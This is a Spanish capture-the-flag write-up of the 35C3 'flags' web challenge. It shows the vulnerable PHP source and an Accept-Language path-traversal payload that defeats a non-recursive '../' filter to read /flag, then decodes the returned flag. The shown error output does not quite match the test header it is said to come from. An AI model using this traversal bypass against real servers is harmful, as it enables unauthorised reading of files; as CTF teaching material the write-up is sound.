# flags (web, 37p, 411 solved)

> Fun with flags: http://35.207.169.47
>
> Flag is at /flag
>
> Difficulty estimate: Easy

Nos dicen que la flag esta en la ruta `/flag`

El codigo del backend nos lo dan:

```
<?php
  highlight_file(__FILE__);
  $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? 'ot';
  $lang = explode(',', $lang)[0];
  $lang = str_replace('../', '', $lang);
  $c = file_get_contents("flags/$lang");
  if (!$c) $c = file_get_contents("flags/ot");
  echo '<img src="data:image/jpeg;base64,' . base64_encode($c) . '">';
```

Al parecer esta fitrando por un idioma cuya abreviacion es "ot".

La funcion "file_get_contents(...)" permite rutas relativas, por tanto vamos a
hacer bypass a el "str_replace(...)" que no es recursivo y probamos paths.

Ademas esta formando la ruta de la que renderiza la imagen cogiendo la primera
parte del campo de cabecera del idioma.

Pruebo con:

```
Accept-Language: test,ot;q=0.5
```

Me responde:

```
 Warning: file_get_contents(flags/flag): failed to open stream: No such file or directory in /var/www/html/index.php on line 6
```

Ya tengo el path en el que estoy, con ir al que toca lo tenemos:

```
Accept-Language: ..././..././..././..././flag,ot
```

La respuesta contiene un base64 que parece ser la flag:

```
</code><img src="data:image/jpeg;base64,MzVjM190aGlzX2ZsYWdfaXNfdGhlX2JlNXRfZmw0Zwo=">
```

Convirtiendo a texto tengo: 35c3_this_flag_is_the_be5t_fl4g

Checked!
